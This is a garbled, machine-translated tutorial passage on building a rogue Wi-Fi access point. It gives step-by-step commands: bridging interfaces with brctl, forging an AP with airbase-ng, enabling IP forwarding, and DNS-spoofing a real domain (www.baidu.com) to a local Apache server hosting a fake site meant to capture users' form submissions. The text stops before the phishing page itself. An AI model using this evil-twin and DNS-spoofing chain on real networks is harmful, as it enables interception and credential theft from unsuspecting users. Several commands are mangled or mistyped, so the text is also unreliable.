The first step: enter the Monitor mode (previous articles have explained)
Step two: Forged AP:
Bridging a wireless network card packages apt-get install bridge-utils
Adding Bridge brctl addbr bridge
First network connection card NIC is added to the bridge which brctl addif bridge eth0 # eth0 is connected to a network, may be wired or wireless network adapter card
To add your own fake AP to bridge wireless card inside brctl addif bridge at0 # at0 forged AP wireless network card
Clear the IP address of the network card ifconfig eth0 0.0.0.0 up
Clear AP LAN IP address ifconfig at0 0.0.0.0 up
Assign an IP address to the bridge interfaces ifconfig bridge 192.168.1.10 up
Add gateway route add -net 0.0.0.0 netmask 0.0.0.0 gw 192.168.1.1
Start IP forwarding echo 1> / proc / sys / net / ipv4 / ip_forward
Forgery of AP: airbase-ng -c 11 --essid TP_LINK722 wla0mon # -c --essid designated channel to the AP wlan0mon use falsified card
The third step: DNS spoofing
dnsspoof -i bridge -f dnsspoof.hosts # -i -f bridge using deception to deceive the domain URL configuration files (the format of the configuration file can reference
/usr/share/dsniff/dnsspoof.hosts) example: 192.168.1.110 www.baidu.com Baidu the access request address forged steering native
And then start the service apachet2ctl start apach
The following steps will fake website you want, fill out information such as the user submits the form: